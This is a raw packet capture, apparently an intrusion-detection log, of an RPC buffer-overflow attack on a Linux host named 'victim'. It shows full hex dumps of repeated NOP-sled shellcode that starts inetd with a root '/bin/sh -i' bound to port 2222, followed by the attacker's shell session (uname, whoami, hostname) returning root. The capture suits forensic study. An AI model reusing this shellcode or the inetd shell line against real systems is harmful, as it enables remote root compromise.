11/14-16:58:36.917513 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x62 192.168.20.11:902 -> 192.168.128.50:111 UDP TTL:63 TOS:0x0 ID:44507 IpLen:20 DgmLen:84 Len: 64 3C F6 DE D3 00 00 00 00 00 00 00 02 00 01 86 A0 <............... 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 04 93 F3 00 00 00 01 ................ 00 00 00 11 00 00 00 00 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:36.918010 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x46 192.168.128.50:111 -> 192.168.20.11:902 UDP TTL:64 TOS:0x0 ID:1163 IpLen:20 DgmLen:56 Len: 36 3C F6 DE D3 00 00 00 01 00 00 00 00 00 00 00 00 <............... 00 00 00 00 00 00 00 00 00 00 03 6C ...........l =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:36.919494 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x456 192.168.20.11:903 -> 192.168.128.50:876 UDP TTL:63 TOS:0x0 ID:44508 IpLen:20 DgmLen:1096 Len: 1076 3C F6 DE EE 00 00 00 00 00 00 00 02 00 04 93 F3 <............... 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 03 FD 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 28 5E 8D 5E 10 89 1E 83 C3 08 89 5E 04 ...(^.^.......^. 83 C3 03 89 5E 08 83 EB 0B 8D 0E 89 CA 33 C0 89 ....^........3.. 46 0C 88 46 17 88 46 1A B0 0B CD 80 E8 D3 FF FF F..F..F......... FF 31 38 20 4A 61 6E 20 31 39 39 38 2D 2D 73 74 .18 Jan 1998--st 72 2F 62 69 6E 2F 73 68 28 2D 63 29 2F 62 69 6E r/bin/sh(-c)/bin 2F 65 63 68 6F 20 27 32 32 32 32 20 20 20 20 20 /echo '2222 20 20 20 73 74 72 65 61 6D 20 20 74 63 70 20 20 stream tcp 20 20 20 6E 6F 77 61 69 74 20 20 72 6F 6F 74 20 nowait root 20 20 20 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 /bin/sh sh -i 27 3E 3E 20 2F 74 6D 70 2F 68 3B 2F 75 73 72 2F '>> /tmp/h;/usr/ 73 62 69 6E 2F 69 6E 65 74 64 20 2F 74 6D 70 2F sbin/inetd /tmp/ 68 20 26 23 90 D2 F2 FF BF D2 F2 FF BF D2 F2 FF h &#............ BF D2 F2 FF BF D2 F2 FF BF 00 00 00 ............ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:42.310583 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x456 192.168.20.11:903 -> 192.168.128.50:876 UDP TTL:63 TOS:0x0 ID:44510 IpLen:20 DgmLen:1096 Len: 1076 3C F6 DE EE 00 00 00 00 00 00 00 02 00 04 93 F3 <............... 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 03 FD 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 28 5E 8D 5E 10 89 1E 83 C3 08 89 5E 04 ...(^.^.......^. 83 C3 03 89 5E 08 83 EB 0B 8D 0E 89 CA 33 C0 89 ....^........3.. 46 0C 88 46 17 88 46 1A B0 0B CD 80 E8 D3 FF FF F..F..F......... FF 31 38 20 4A 61 6E 20 31 39 39 38 2D 2D 73 74 .18 Jan 1998--st 72 2F 62 69 6E 2F 73 68 28 2D 63 29 2F 62 69 6E r/bin/sh(-c)/bin 2F 65 63 68 6F 20 27 32 32 32 32 20 20 20 20 20 /echo '2222 20 20 20 73 74 72 65 61 6D 20 20 74 63 70 20 20 stream tcp 20 20 20 6E 6F 77 61 69 74 20 20 72 6F 6F 74 20 nowait root 20 20 20 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 /bin/sh sh -i 27 3E 3E 20 2F 74 6D 70 2F 68 3B 2F 75 73 72 2F '>> /tmp/h;/usr/ 73 62 69 6E 2F 69 6E 65 74 64 20 2F 74 6D 70 2F sbin/inetd /tmp/ 68 20 26 23 90 D2 F2 FF BF D2 F2 FF BF D2 F2 FF h &#............ 
BF D2 F2 FF BF D2 F2 FF BF 00 00 00 ............ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.280789 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x4A 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44512 IpLen:20 DgmLen:60 DF ******S* Seq: 0xCAAA5BFC Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 115105103 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.280877 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x4A 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1165 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0xC9B2D9B6 Ack: 0xCAAA5BFD Win: 0x77C4 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 34781 115105103 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.281809 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44513 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5BFD Ack: 0xC9B2D9B7 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105103 34781 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.282487 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x51 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44514 IpLen:20 DgmLen:67 DF ***AP*** Seq: 0xCAAA5BFD Ack: 0xC9B2D9B7 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105103 34781 75 6E 61 6D 65 20 2D 61 3B 20 70 77 64 3B 0A uname -a; pwd;. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.282573 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1166 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xC9B2D9B7 Ack: 0xCAAA5C0C Win: 0x77C4 TcpLen: 32 TCP Options (3) => NOP NOP TS: 34781 115105103 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.292970 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x48 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1167 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0xC9B2D9B7 Ack: 0xCAAA5C0C Win: 0x77C4 TcpLen: 32 TCP Options (3) => NOP NOP TS: 34782 115105103 62 61 73 68 23 20 bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.293622 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44516 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C0C Ack: 0xC9B2D9BD Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105104 34782 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.293702 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x51 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1168 IpLen:20 DgmLen:67 DF ***AP*** Seq: 0xC9B2D9BD Ack: 0xCAAA5C0C Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 34782 115105104 75 6E 61 6D 65 20 2D 61 3B 20 70 77 64 3B 0A uname -a; pwd;. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.299647 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44517 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C0C Ack: 0xC9B2D9CC Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105105 34782 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.299751 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x8E 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1169 IpLen:20 DgmLen:128 DF ***AP*** Seq: 0xC9B2D9CC Ack: 0xCAAA5C0C Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 34783 115105105 4C 69 6E 75 78 20 76 69 63 74 69 6D 20 32 2E 32 Linux victim 2.2 2E 31 32 2D 32 30 20 23 31 20 4D 6F 6E 20 53 65 .12-20 #1 Mon Se 70 20 32 37 20 31 30 3A 34 30 3A 33 35 20 45 44 p 27 10:40:35 ED 54 20 31 39 39 39 20 69 36 38 36 20 75 6E 6B 6E T 1999 i686 unkn 6F 77 6E 0A 2F 0A 62 61 73 68 23 20 own./.bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.310116 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44519 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C0C Ack: 0xC9B2DA18 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105106 34783 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.026918 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x49 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44527 IpLen:20 DgmLen:59 DF ***AP*** Seq: 0xCAAA5C0C Ack: 0xC9B2DA18 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105377 34783 77 68 6F 61 6D 69 0A whoami. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.027086 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1170 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xC9B2DA18 Ack: 0xCAAA5C13 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35056 115105377 77 w =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.040532 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44529 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C13 Ack: 0xC9B2DA19 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105379 35056 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.040648 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x48 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1171 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0xC9B2DA19 Ack: 0xCAAA5C13 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35057 115105379 68 6F 61 6D 69 0A hoami. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.060514 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44531 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C13 Ack: 0xC9B2DA1F Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105381 35057 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.060608 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x4D 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1172 IpLen:20 DgmLen:63 DF ***AP*** Seq: 0xC9B2DA1F Ack: 0xCAAA5C13 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35059 115105381 72 6F 6F 74 0A 62 61 73 68 23 20 root.bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.079999 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44533 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C13 Ack: 0xC9B2DA2A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105383 35059 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.301036 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x456 192.168.20.11:903 -> 192.168.128.50:876 UDP TTL:63 TOS:0x0 ID:44534 IpLen:20 DgmLen:1096 Len: 1076 3C F6 DE EE 00 00 00 00 00 00 00 02 00 04 93 F3 <............... 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 03 FD 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 28 5E 8D 5E 10 89 1E 83 C3 08 89 5E 04 ...(^.^.......^. 83 C3 03 89 5E 08 83 EB 0B 8D 0E 89 CA 33 C0 89 ....^........3.. 46 0C 88 46 17 88 46 1A B0 0B CD 80 E8 D3 FF FF F..F..F......... FF 31 38 20 4A 61 6E 20 31 39 39 38 2D 2D 73 74 .18 Jan 1998--st 72 2F 62 69 6E 2F 73 68 28 2D 63 29 2F 62 69 6E r/bin/sh(-c)/bin 2F 65 63 68 6F 20 27 32 32 32 32 20 20 20 20 20 /echo '2222 20 20 20 73 74 72 65 61 6D 20 20 74 63 70 20 20 stream tcp 20 20 20 6E 6F 77 61 69 74 20 20 72 6F 6F 74 20 nowait root 20 20 20 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 /bin/sh sh -i 27 3E 3E 20 2F 74 6D 70 2F 68 3B 2F 75 73 72 2F '>> /tmp/h;/usr/ 73 62 69 6E 2F 69 6E 65 74 64 20 2F 74 6D 70 2F sbin/inetd /tmp/ 68 20 26 23 90 D2 F2 FF BF D2 F2 FF BF D2 F2 FF h &#............ BF D2 F2 FF BF D2 F2 FF BF 00 00 00 ............ 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:48.887650 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x4B 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44544 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0xCAAA5C13 Ack: 0xC9B2DA2A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105563 35059 68 6F 73 74 6E 61 6D 65 0A hostname. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:48.887782 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1174 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xC9B2DA2A Ack: 0xCAAA5C1C Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35242 115105563 68 h =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:48.909452 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44546 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C1C Ack: 0xC9B2DA2B Win: 0x7D78 TcpLen: 32 